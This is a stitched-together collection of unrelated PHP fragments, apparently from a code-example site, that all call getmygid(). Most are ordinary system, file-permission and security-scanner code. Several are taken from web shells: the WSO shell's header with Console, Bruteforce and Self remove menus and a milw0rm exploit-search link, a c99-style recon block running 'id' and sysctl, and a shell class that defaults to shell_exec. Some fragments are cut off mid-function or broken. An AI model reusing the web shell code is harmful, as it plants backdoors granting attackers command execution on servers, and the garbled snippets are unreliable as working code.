/**
* Checks the GID of the PHP process to make sure it is above PHPSECINFO_MIN_SAFE_GID
*
* @see PHPSECINFO_MIN_SAFE_GID
*/
function _execTest()
{
if (getmygid() >= PHPSECINFO_MIN_SAFE_GID) {
return PHPSECINFO_TEST_RESULT_OK;
}
return PHPSECINFO_TEST_RESULT_WARN;
}
/**
* @param CommandSender $sender
*/
public function sendPHPInfo(CommandSender $sender)
{
$info = ["CWD" => getcwd(), "GID" => getmygid(), "PID" => getmypid(), "UID" => getmyuid(), "Memory-usage" => memory_get_usage(true), "Memory-peak-usage" => memory_get_peak_usage(true), "PHP-version" => phpversion(), "Zend-version" => zend_version()];
foreach ($info as $key => $value) {
$sender->sendMessage($key . ": " . $value);
}
}
public function mount()
{
$this->runCommand("sudo mount -t tmpfs -o size={$this->getSizeMb()}m tmpfs {$this->ram_disk_path}");
$uid = getmyuid();
$gid = getmygid();
$this->runCommand("sudo chown {$uid}:{$gid} {$this->ram_disk_path}");
$this->runCommand("chmod 0755 {$this->ram_disk_path}");
}
/**
* sd_pid_notify_with_fds PHP implementation
*
* @param int $pid FIXME currently not usable!
* @param bool $unset_environment
* @param string $state
* @param array $fds
*
* @return int
*
* @link https://github.com/systemd/systemd/blob/master/src/libsystemd/sd-daemon/sd-daemon.c
*/
function sd_pid_notify_with_fds($pid, $unset_environment, $state, array $fds)
{
$state = trim($state);
if ('' === $state) {
$r = -EINVAL;
goto finish;
}
$e = getenv('NOTIFY_SOCKET');
if (!$e) {
return 0;
}
/* Must be an abstract socket, or an absolute path */
if (strlen($e) < 2 || strpos($e, '@') !== 0 && strpos($e, '/') !== 0) {
$r = -EINVAL;
goto finish;
}
$fd = socket_create(AF_UNIX, SOCK_DGRAM, 0);
if (!$fd) {
$r = -1 * socket_last_error();
goto finish;
}
$msghdr = ['name' => ['path' => $e], 'iov' => [$state . "\n"], 'control' => []];
if (strpos($msghdr['name']['path'], '@') === 0) {
$msghdr['name'][0] = "";
}
$pid = (int) $pid;
$have_pid = $pid && getmypid() !== $pid;
if (count($fds) > 0 || $have_pid) {
if (count($fds)) {
$msghdr['control'][] = ['level' => SOL_SOCKET, 'type' => SCM_RIGHTS, 'data' => $fds];
}
if ($have_pid) {
$msghdr['control'][] = ['level' => SOL_SOCKET, 'type' => SCM_CREDENTIALS, 'data' => ['pid' => $pid, 'uid' => getmyuid(), 'gid' => getmygid()]];
}
}
/* First try with fake ucred data, as requested */
if (@socket_sendmsg($fd, $msghdr, MSG_NOSIGNAL) !== false) {
$r = 1;
goto finish;
}
/* If that failed, try with our own ucred instead */
if ($have_pid) {
$msghdr['control'] = [];
if (@socket_sendmsg($fd, $msghdr, MSG_NOSIGNAL) !== false) {
$r = 1;
goto finish;
}
}
$r = -1 * socket_last_error($fd);
finish:
if (isset($fd) && $fd) {
socket_close($fd);
}
if ($unset_environment) {
putenv('NOTIFY_SOCKET');
}
return $r;
}
function randomBytes($length = 16, $secure = true, $raw = true, $startEntropy = "", &$rounds = 0, &$drop = 0)
{
static $lastRandom = "";
$output = "";
$length = abs((int) $length);
$secureValue = "";
$rounds = 0;
$drop = 0;
while (!isset($output[$length - 1])) {
//some entropy, but works ^^
$weakEntropy = array(is_array($startEntropy) ? implode($startEntropy) : $startEntropy, serialize(stat(__FILE__)), __DIR__, PHP_OS, microtime(), (string) lcg_value(), (string) PHP_MAXPATHLEN, PHP_SAPI, (string) PHP_INT_MAX . "." . PHP_INT_SIZE, serialize($_SERVER), serialize(get_defined_constants()), get_current_user(), serialize(ini_get_all()), (string) memory_get_usage() . "." . memory_get_peak_usage(), php_uname(), phpversion(), extension_loaded("gmp") ? gmp_strval(gmp_random(4)) : microtime(), zend_version(), (string) getmypid(), (string) getmyuid(), (string) mt_rand(), (string) getmyinode(), (string) getmygid(), (string) rand(), function_exists("zend_thread_id") ? (string) zend_thread_id() : microtime(), var_export(@get_browser(), true), function_exists("getrusage") ? @implode(getrusage()) : microtime(), function_exists("sys_getloadavg") ? @implode(sys_getloadavg()) : microtime(), serialize(get_loaded_extensions()), sys_get_temp_dir(), (string) disk_free_space("."), (string) disk_total_space("."), uniqid(microtime(), true), file_exists("/proc/cpuinfo") ? file_get_contents("/proc/cpuinfo") : microtime());
shuffle($weakEntropy);
$value = hash("sha512", implode($weakEntropy), true);
$lastRandom .= $value;
foreach ($weakEntropy as $k => $c) {
//mixing entropy values with XOR and hash randomness extractor
$value ^= hash("sha256", $c . microtime() . $k, true) . hash("sha256", mt_rand() . microtime() . $k . $c, true);
$value ^= hash("sha512", (string) lcg_value() . $c . microtime() . $k, true);
}
unset($weakEntropy);
if ($secure === true) {
$strongEntropyValues = array(is_array($startEntropy) ? hash("sha512", $startEntropy[($rounds + $drop) % count($startEntropy)], true) : hash("sha512", $startEntropy, true), file_exists("/dev/urandom") ? fread(fopen("/dev/urandom", "rb"), 64) : str_repeat("", 64), (function_exists("openssl_random_pseudo_bytes") and version_compare(PHP_VERSION, "5.3.4", ">=")) ? openssl_random_pseudo_bytes(64) : str_repeat("", 64), function_exists("mcrypt_create_iv") ? mcrypt_create_iv(64, MCRYPT_DEV_URANDOM) : str_repeat("", 64), $value);
$strongEntropy = array_pop($strongEntropyValues);
foreach ($strongEntropyValues as $value) {
$strongEntropy = $strongEntropy ^ $value;
}
$value = "";
//Von Neumann randomness extractor, increases entropy
$bitcnt = 0;
for ($j = 0; $j < 64; ++$j) {
$a = ord($strongEntropy[$j]);
for ($i = 0; $i < 8; $i += 2) {
$b = ($a & 1 << $i) > 0 ? 1 : 0;
if ($b != (($a & 1 << $i + 1) > 0 ? 1 : 0)) {
$secureValue |= $b << $bitcnt;
if ($bitcnt == 7) {
$value .= chr($secureValue);
$secureValue = 0;
$bitcnt = 0;
} else {
++$bitcnt;
}
++$drop;
} else {
$drop += 2;
}
}
}
}
$output .= substr($value, 0, min($length - strlen($output), $length));
unset($value);
++$rounds;
}
$lastRandom = hash("sha512", $lastRandom, true);
return $raw === false ? bin2hex($output) : $output;
}
public function url_stat($path)
{
$mode = 0666;
$uid = 0;
$gid = 0;
$len = strlen('fiemulate://');
$type = substr($path, $len, 1);
switch (substr($path, $len, 1)) {
case 'u':
$uid = getmyuid();
$gid = getmygid() + 1;
switch (substr($path, $len + 2)) {
case 'not_readable':
$mode &= ~0400;
break;
case 'not_writable':
$mode &= ~0200;
break;
}
break;
case 'g':
$uid = getmyuid() + 1;
$gid = getmygid();
switch (substr($path, $len + 2)) {
case 'not_readable':
$mode &= ~0440;
break;
case 'not_writable':
$mode &= ~0220;
break;
}
break;
case 'o':
$uid = getmyuid() + 1;
$gid = getmygid() + 1;
switch (substr($path, $len + 2)) {
case 'not_readable':
$mode &= ~0444;
break;
case 'not_writable':
$mode &= ~0222;
break;
}
break;
case 'a':
$uid = getmyuid();
$gid = getmygid();
break;
}
$keys = array('dev', 'ino', 'mode', 'nlink', 'uid', 'gid', 'rdev', 'size', 'atime', 'mtime', 'ctime', 'blksize', 'blocks');
$values = array(0, 0, $mode, 0, $uid, $gid, 0, 0, 0, 0, 0, 0, 0);
foreach ($keys as $index => $key) {
$values[$key] = $values[$index];
}
return $values;
}
public static function matchingLetter($file)
{
if (fileowner($file) === getmyuid()) {
return 'u';
}
if (filegroup($file) === getmygid()) {
return 'g';
}
return 'o';
}
/**
* @param null $value
*
* @return bool
*/
public static function state($value = null)
{
$stateFile = sprintf("/tmp/sonata_behat_test_%s.state", getmygid());
if (!is_file($stateFile)) {
file_put_contents($stateFile, "0");
}
if ($value === null) {
return file_get_contents($stateFile) === "0" ? false : true;
}
file_put_contents($stateFile, $value === true ? "1" : "0");
}
public function pull_project()
{
if (!is_cli()) {
echo 'This controller must run from command line interface only.' . PHP_EOL;
return;
}
exec('git pull');
exec('chown ' . getmyuid() . ':' . getmygid() . ' ' . FCPATH . '.. -R');
exec('chmod 0777 ' . APPPATH . 'cache');
exec('chmod 0777 ' . APPPATH . 'logs');
}
/**
* Check if path is writable.
*
* @param string $path
* @return bool
*/
public static function isWritable($path)
{
if (!is_writable($path)) {
return false;
}
if (ini_get('safe_mode')) {
if (ini_get('safe_mode_gid') ? getmygid() != filegroup($path) : getmyuid() != fileowner($path)) {
return false;
}
}
return true;
}
public function __construct()
{
$this->config = array('filename' => basename(__FILE__), 'username' => '', 'password' => '', 'interpreter' => 'shell_exec', 'current_user' => get_current_user(), 'hostname' => function_exists('gethostname') ? gethostname() : $_SERVER['HTTP_HOST'], 'server_address' => isset($_SERVER['SERVER_ADDR']) ? $_SERVER['SERVER_ADDR'] : '127.0.0.1', 'server_port' => $_SERVER['SERVER_PORT'], 'request_time' => $_SERVER['REQUEST_TIME'], 'php_owner_uid' => getmyuid(), 'php_owner_gid' => getmygid(), 'php_process_id' => getmypid(), 'inode_script' => getmyinode(), 'last_page_modification' => getlastmod(), 'cwd' => getcwd());
if (isset($_SESSION['interpreter'])) {
$this->config['interpreter'] = $_SESSION['interpreter'];
}
if (isset($_SESSION['cwd']) && $_SESSION['cwd'] != $this->config['cwd']) {
chdir($_SESSION['cwd']);
$this->config['cwd'] = getcwd();
}
$this->config['prompt'] = $this->get_prompt();
}
protected function _init()
{
$this->os = new Zend_Environment_Field(array('title' => 'OS', 'info' => 'Host operating system', 'value' => PHP_OS));
$this->uid = new Zend_Environment_Field(array('title' => 'Script uid', 'info' => 'script user id', 'value' => getmyuid()));
$this->gid = new Zend_Environment_Field(array('title' => 'Script gid', 'info' => 'script group id', 'value' => getmygid()));
$this->script_username = new Zend_Environment_Field(array('title' => 'Script username', 'info' => 'username obtained via HTTP authentication', 'value' => get_current_user()));
$this->memory = new Zend_Environment_Field(array('title' => 'Memory', 'info' => 'Memory used by this script on host'));
if (function_exists('memory_get_usage')) {
$this->memory->value = memory_get_usage();
} else {
$this->memory->notice = 'memory_get_usage() not enabled';
}
}
function Myevents($text=null,$function=null){
$pid=getmygid();
$file="/var/log/artica-postfix/watchdog.debug";
@mkdir(dirname($file));
$logFile=$file;
if (is_file($logFile)) {
$size=filesize($logFile);
if($size>100000){unlink($logFile);}
}
$date=date('Y-m-d H:i:s'). " [$pid]: ";
$f = @fopen($logFile, 'a');
@fwrite($f, "$date $function:: $text\n");
@fclose($f);
}
public function stat()
{
$time = time();
if ($this->_getStreamContent() != null) {
$size = strlen($this->_getStreamContent());
} else {
$size = 0;
}
$uid = getmyuid();
$gid = getmygid();
$mode = octdec(100000 + $this->_getStreamMode());
$keys = array('dev' => 0, 'ino' => 0, 'mode' => $mode, 'nlink' => 0, 'uid' => $uid, 'gid' => $gid, 'rdev' => 0, 'size' => $size, 'atime' => $time, 'mtime' => $time, 'ctime' => $time, 'blksize' => 0, 'blocks' => 0);
$return_value = $keys + array_values($keys);
return $return;
}
public function __construct()
{
$this->scriptFilename = $this->getServerVar('SCRIPT_FILENAME');
$this->documentRoot = $this->getServerVar('DOCUMENT_ROOT');
$this->httpHost = $this->getServerVar('HTTP_HOST');
$this->adminEmail = $this->getServerVar('SERVER_ADMIN');
$this->time = date('Y.m.d H:i:s', $this->getServerVar('REQUEST_TIME'));
$this->serverAddr = $this->getServerVar('SERVER_ADDR');
$this->serverSoftware = $this->getServerVar('SERVER_SOFTWARE');
$this->serverGateway = $this->getServerVar('GATEWAY_INTERFACE');
$this->serverSignature = $this->getServerVar('SERVER_SIGNATURE');
$this->serverHostname = @php_uname('n');
$this->serverPlatform = @php_uname('s') . ' ' . @php_uname('r') . ' ' . @php_uname('v');
$this->serverArchitecture = @php_uname('m');
$this->username = '******' . @getmyuid() . ', gid: ' . @getmygid();
$this->pathinfo = getcwd();
$this->phpinfo = $this->getCompactPhpInfo();
}
function printHeader() {
if(empty($_POST['charset']))
$_POST['charset'] = "UTF-8";
global $color;
?>
<html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?> - WSO <?=VERSION?></title>
<style>
body { background-color:#444;font: 9pt Lucida,Verdana;color:#e1e1e1;margin: 0; }
td,th { font: 9pt Lucida,Verdana;vertical-align:top; }
table.info { color:#fff;background-color:#222; }
span { color:<?=$color?>;font-weight: bolder; }
h1 { color:<?=$color?>;border-left:5px solid <?=$color?>;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content { padding: 5px;margin-left:5px;background-color:#333; }
a { text-decoration:none; color:<?=$color?>; }
a:hover { text-decoration:underline; }
.ml1 { border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea { width:100%;height:250px; }
input, textarea, select { margin:0;color:#fff;background-color:#555;border:1px solid <?=$color?>; font: 9pt Monospace,"Courier New"; }
form { margin:0px; }
#toolsTbl { text-align:center; }
.toolsInp { width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.main td, th{vertical-align:middle}
.l1 {background-color:#444}
pre{font-family:Courier,Monospace;}
</style>
<script>
function set(a,c,p1,p2,p3,charset) {
if(a != null)document.mf.a.value=a;
if(c != null)document.mf.c.value=c;
if(p1 != null)document.mf.p1.value=p1;
if(p2 != null)document.mf.p2.value=p2;
if(p3 != null)document.mf.p3.value=p3;
if(charset != null)document.mf.charset.value=charset;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
document.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = "ajax=true";
for(i=0;i<document.mf.elements.length;i++)
params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
sr('<?=$_SERVER['REQUEST_URI'];?>', params);
}
function sr(url, params) {
if (window.XMLHttpRequest) {
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open("POST", url, true);
req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
req.send(params);
}
else if (window.ActiveXObject) {
req = new ActiveXObject("Microsoft.XMLHTTP");
if (req) {
req.onreadystatechange = processReqChange;
req.open("POST", url, true);
req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
req.send(params);
}
}
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
//alert(req.responseText);
var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
}
else alert("Request error!");
}
</script>
<head><body>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'>
<input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
<input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'>
<input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'>
<input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'>
<input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
</form>
<?php
$freeSpace = @diskfreespace($GLOBALS['cwd']);
$totalSpace = @disk_total_space($GLOBALS['cwd']);
$totalSpace = $totalSpace?$totalSpace:1;
$release = @php_uname('r');
$kernel = @php_uname('s');
$millink='http://milw0rm.com/search.php?dong=';
if( strpos('Linux', $kernel) !== false )
$millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
else
$millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(@posix_geteuid());
$gid = @posix_getgrgid(@posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$cwd_links = '';
$path = explode("/", $GLOBALS['cwd']);
$n=count($path);
for($i=0;$i<$n-1;$i++) {
$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
for($j=0;$j<=$i;$j++)
$cwd_links .= $path[$j].'/';
$cwd_links .= "\")'>".$path[$i]."/</a>";
}
$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
$opt_charsets = '';
foreach($charsets as $item)
$opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
$m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network', 'Logout'=>'Logout', 'Self remove' => 'SelfRemove');
$menu = '';
foreach($m as $k => $v)
$menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
$drives = "";
if ($GLOBALS['os'] == 'win') {
foreach( range('a','z') as $drive )
if (is_dir($drive.':\\'))
$drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
}
echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os'] == 'win'?'<br>Drives:':'').'</span></td>'.
'<td><nobr>'.substr(@php_uname(), 0, 120).' <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[milw0rm]</a></nobr><br>'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00bb00><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'.
'<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
'<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">';
}
function getuser()
{
$out = get_current_user();
if ($out != "SYSTEM") {
if (($out = ex('id')) == '') {
$out = "uid=" . getmyuid() . "(" . get_current_user() . ") gid=" . getmygid();
}
}
return $out;
}
$lin2 = ex('sysctl -n kernel.osrelease');
}
if (!empty($bsd1) && !empty($bsd2)) {
$sysctl = "{$bsd1} {$bsd2}";
} else {
if (!empty($lin1) && !empty($lin2)) {
$sysctl = "{$lin1} {$lin2}";
} else {
$sysctl = "-";
}
}
echo ws(3) . $sysctl . "<br>";
echo ws(3) . ex('echo $OSTYPE') . "<br>";
echo ws(3) . @substr($SERVER_SOFTWARE, 0, 120) . "<br>";
$id = ex('id');
echo !empty($id) ? ws(3) . $id . "<br>" : ws(3) . "user="******" uid=" . @getmyuid() . " gid=" . @getmygid() . "<br>";
echo ws(3) . $dir;
echo ws(3) . '( ' . perms(@fileperms($dir)) . ' )';
echo "</b></font>";
} else {
echo '<font color=blue><b>OS :' . ws(1) . '<br>Server :' . ws(1) . '<br>User :'******'<br>pwd :' . ws(1) . '</b></font><br>';
echo "</td><td>";
echo "<font face=Verdana size=-2 color=red><b>";
echo ws(3) . @substr(@php_uname(), 0, 120) . "<br>";
echo ws(3) . @substr($SERVER_SOFTWARE, 0, 120) . "<br>";
echo ws(3) . @get_current_user() . "<br>";
echo ws(3) . $dir;
echo "<br></font>";
}
echo "</font>";
echo "</td></tr></table>";
<?php
print "{";
print "\"GroupId\":\"" . getmygid() . "\",";
print "\"UserId\":\"" . getmyuid() . "\"";
print "}";
function GOTMLS_scanfile($file)
{
global $wp_version, $GOTMLS_threat_files, $GOTMLS_threats_found, $GOTMLS_chmod_file, $GOTMLS_chmod_dir, $GOTMLS_file_contents, $GOTMLS_new_contents;
$GOTMLS_threats_found = array();
$gt = ">";
$lt = "<";
$found = false;
$threat_link = "";
$className = "scanned";
$clean_file = GOTMLS_encode($file);
$file_name = GOTMLS_explode_dir($file);
$file_parts = explode(".", "." . array_pop($file_name));
if (is_file($file) && ($filesize = filesize($file)) && ($GOTMLS_file_contents = @file_get_contents($file))) {
if (isset($GLOBALS["GOTMLS"]["tmp"]["definitions_array"]["wp_core"]["{$wp_version}"]) && is_array($GLOBALS["GOTMLS"]["tmp"]["definitions_array"]["wp_core"]["{$wp_version}"])) {
$whitelist = array_flip($GLOBALS["GOTMLS"]["tmp"]["definitions_array"]["wp_core"]["{$wp_version}"]);
} else {
$whitelist = array();
}
foreach ($GLOBALS["GOTMLS"]["tmp"]["definitions_array"]["whitelist"] as $whitelist_file => $non_threats) {
if (is_array($non_threats) && count($non_threats) > 1) {
if (isset($non_threats[0])) {
unset($non_threats[0]);
}
$whitelist = array_merge($whitelist, $non_threats);
}
}
if (isset($whitelist[md5($GOTMLS_file_contents) . 'O' . $filesize])) {
return GOTMLS_return_threat($className, "checked.gif?{$className}", $file, $threat_link);
}
$GOTMLS_new_contents = $GOTMLS_file_contents;
if (isset($GLOBALS["GOTMLS"]["log"]["settings"]["check_custom"]) && strlen($GLOBALS["GOTMLS"]["log"]["settings"]["check_custom"]) && isset($_GET['eli']) && substr($GLOBALS["GOTMLS"]["log"]["settings"]["check_custom"], 0, 1) == '/' && ($found = GOTMLS_check_threat($GLOBALS["GOTMLS"]["log"]["settings"]["check_custom"]))) {
$className = "known";
} else {
$path = str_replace("//", "/", "/" . str_replace("\\", "/", substr($file, strlen(ABSPATH))));
if (isset($_SESSION["GOTMLS_debug"])) {
$_SESSION["GOTMLS_debug"]["file"] = $file;
$_SESSION["GOTMLS_debug"]["last"]["total"] = microtime(true);
}
foreach ($GLOBALS["GOTMLS"]["tmp"]["threat_levels"] as $threat_level) {
if (isset($_SESSION["GOTMLS_debug"])) {
$_SESSION["GOTMLS_debug"]["threat_level"] = $threat_level;
$_SESSION["GOTMLS_debug"]["last"]["threat_level"] = microtime(true);
}
if (in_array($threat_level, $GLOBALS["GOTMLS"]["log"]["settings"]["check"]) && !$found && isset($GLOBALS["GOTMLS"]["tmp"]["definitions_array"][$threat_level]) && ($threat_level != "wp_core" || substr($file, 0, strlen(ABSPATH)) == ABSPATH && isset($GLOBALS["GOTMLS"]["tmp"]["definitions_array"]["wp_core"]["{$wp_version}"]["{$path}"])) && (!array_key_exists($threat_level, $GOTMLS_threat_files) || substr($file . "e", -1 * strlen($GOTMLS_threat_files[$threat_level] . "e")) == $GOTMLS_threat_files[$threat_level] . "e") && ($found = GOTMLS_check_threat($GLOBALS["GOTMLS"]["tmp"]["definitions_array"][$threat_level], $file))) {
$className = $threat_level;
}
}
if (isset($_SESSION["GOTMLS_debug"])) {
$file_time = round(microtime(true) - $_SESSION["GOTMLS_debug"]["last"]["total"], 5);
if (isset($_SESSION["GOTMLS_debug"]["total"]["total"])) {
$_SESSION["GOTMLS_debug"]["total"]["total"] += $file_time;
} else {
$_SESSION["GOTMLS_debug"]["total"]["total"] = $file_time;
}
if (isset($_SESSION["GOTMLS_debug"]["total"]["count"])) {
$_SESSION["GOTMLS_debug"]["total"]["count"]++;
} else {
$_SESSION["GOTMLS_debug"]["total"]["count"] = 1;
}
if (!isset($_SESSION["GOTMLS_debug"]["total"]["least"]) || $file_time < $_SESSION["GOTMLS_debug"]["total"]["least"]) {
$_SESSION["GOTMLS_debug"]["total"]["least"] = $file_time;
}
if (!isset($_SESSION["GOTMLS_debug"]["total"]["most"]) || $file_time > $_SESSION["GOTMLS_debug"]["total"]["most"]) {
$_SESSION["GOTMLS_debug"]["total"]["most"] = $file_time;
}
}
}
} else {
$GOTMLS_file_contents = is_file($file) ? is_readable($file) ? filesize($file) ? __("Failed to read file contents!", 'gotmls') : __("Empty file!", 'gotmls') : (isset($_GET["eli"]) ? @chmod($file, $GOTMLS_chmod_file) ? __("Fixed file permissions! (try again)", 'gotmls') : __("File permissions read-only!", 'gotmls') : __("File not readable!", 'gotmls')) : __("File does not exist!", 'gotmls');
// $threat_link = GOTMLS_error_link($GOTMLS_file_contents, $file);
$className = "errors";
}
if (count($GOTMLS_threats_found)) {
$threat_link = $lt . 'a target="GOTMLS_iFrame" href="' . GOTMLS_script_URI . '&GOTMLS_scan=' . $clean_file . '" id="list_' . $clean_file . '" onclick="loadIframe(\'' . str_replace("\"", """, $lt . 'div style="float: left;"' . $gt . 'Examine File ... ' . $lt . '/div' . $gt . $lt . 'div style="overflow: hidden; position: relative; height: 20px;"' . $gt . $lt . 'div style="position: absolute; right: 0px; text-align: right; width: 9000px;"' . $gt . GOTMLS_strip4java($file)) . $lt . '/div' . $gt . $lt . '/div' . $gt . '\');" class="GOTMLS_plugin"' . $gt;
if ($className == "errors") {
$threat_link = GOTMLS_error_link($GOTMLS_file_contents, $file);
$imageFile = "/blocked";
} elseif ($className != "potential") {
if (isset($_POST["GOTMLS_fix"]) && is_array($_POST["GOTMLS_fix"]) && in_array($clean_file, $_POST["GOTMLS_fix"])) {
if ($className == "timthumb") {
if (($source = GOTMLS_get_URL("http://{$className}.googlecode.com/svn/trunk/{$className}.php")) && strlen($source) > 500) {
$GOTMLS_new_contents = $source;
} else {
$GOTMLS_file_contents = "";
}
} elseif ($className == 'wp_core') {
$path = str_replace("//", "/", "/" . str_replace("\\", "/", substr($file, strlen(ABSPATH))));
if (substr($file, 0, strlen(ABSPATH)) == ABSPATH && isset($GLOBALS["GOTMLS"]["tmp"]["definitions_array"]["wp_core"]["{$wp_version}"]["{$path}"]) && $GLOBALS["GOTMLS"]["tmp"]["definitions_array"]["wp_core"]["{$wp_version}"]["{$path}"] != md5($GOTMLS_file_contents) . "O" . strlen($GOTMLS_file_contents) && ($source = GOTMLS_get_URL("http://core.svn.wordpress.org/tags/{$wp_version}{$path}")) && $GLOBALS["GOTMLS"]["tmp"]["definitions_array"]["wp_core"]["{$wp_version}"]["{$path}"] == md5($source) . "O" . strlen($source)) {
$GOTMLS_new_contents = $source;
} else {
$GOTMLS_file_contents = "";
}
} else {
$GOTMLS_new_contents = trim(preg_replace('/' . $lt . '\\?(php)?\\s*(\\?' . $gt . '|$)/i', "", $GOTMLS_new_contents));
}
if (strlen($GOTMLS_file_contents) > 0 && GOTMLS_write_quarantine($file, $className) !== false && (strlen($GOTMLS_new_contents) == 0 && isset($_GET["eli"]) && @unlink($file) || GOTMLS_file_put_contents($file, $GOTMLS_new_contents) !== false)) {
echo __("Success!", 'gotmls');
return "/*--{$gt}*" . "/\nfixedFile('{$clean_file}');\n/*{$lt}!--*" . "/";
} else {
echo __("Failed:", 'gotmls') . ' ' . (strlen($GOTMLS_file_contents) ? is_writable(dirname(GOTMLS_quarantine($file))) ? is_writable(dirname($file)) && is_writable($file) ? __("reason unknown!", 'gotmls') : __("file not writable!", 'gotmls') : __("quarantine not writable!", 'gotmls') . ' ' : __("no file contents!", 'gotmls'));
if (isset($_GET["eli"])) {
echo 'uid=' . getmyuid() . '(' . get_current_user() . '),gid=' . getmygid() . (is_writable(dirname(GOTMLS_quarantine($file))) ? $lt . 'br' . $gt . $lt . 'pre' . $gt . 'file_stat' . print_r(stat($file), true) : $lt . 'br' . $gt . $lt . 'pre' . $gt . dirname(GOTMLS_quarantine($file)) . ' stat' . print_r(stat(dirname(GOTMLS_quarantine($file))), true));
}
return "/*--{$gt}*" . "/\nfailedFile('{$clean_file}');\n/*{$lt}!--*" . "/";
}
}
$threat_link = $lt . 'input type="checkbox" name="GOTMLS_fix[]" value="' . $clean_file . '" id="check_' . $clean_file . ($className != "wp_core" ? '" checked="' . $className : '') . '" /' . $gt . $threat_link;
$imageFile = "threat";
} elseif (isset($_POST["GOTMLS_fix"]) && is_array($_POST["GOTMLS_fix"]) && in_array($clean_file, $_POST["GOTMLS_fix"])) {
echo __("Already Fixed!", 'gotmls');
return "/*-->*" . "/\nfixedFile('{$clean_file}');\n/*<!--*" . "/";
} else {
$imageFile = "question";
}
return GOTMLS_return_threat($className, $imageFile, $file, str_replace("GOTMLS_plugin", "GOTMLS_plugin {$className}", $threat_link));
} elseif (isset($_POST["GOTMLS_fix"]) && is_array($_POST["GOTMLS_fix"]) && in_array($clean_file, $_POST["GOTMLS_fix"])) {
if (GOTMLS_trailingslashit($GLOBALS["GOTMLS"]["tmp"]["quarantine_dir"]) == substr($file, 0, strlen(GOTMLS_trailingslashit($GLOBALS["GOTMLS"]["tmp"]["quarantine_dir"])))) {
if (count($file_parts) > 1 && strtolower($file_parts[count($file_parts) - 1]) == "gotmls" && @rename($file, GOTMLS_decode($file_parts[count($file_parts) - 2]))) {
echo __("Restored!", 'gotmls');
return "/*--{$gt}*" . "/\nfixedFile('{$clean_file}');\n/*{$lt}!--*" . "/";
} else {
echo __("Restore Failed!", 'gotmls');
return "";
}
} else {
echo __("Already Fixed!", 'gotmls');
return "/*--{$gt}*" . "/\nfixedFile('{$clean_file}');\n/*{$lt}!--*" . "/";
}
} else {
return GOTMLS_return_threat($className, ($className == "scanned" ? "checked" : "blocked") . ".gif?{$className}", $file, $threat_link);
}
}
/**
* Check UID in folder and Script
* Read http://www.php.net/manual/en/features.safe-mode.php to understand safe_mode
*
* @class nggAdmin
* @param string $foldername
* @return bool $result
*/
function check_safemode($foldername)
{
if (SAFE_MODE) {
$script_uid = ini_get('safe_mode_gid') ? getmygid() : getmyuid();
$folder_uid = fileowner($foldername);
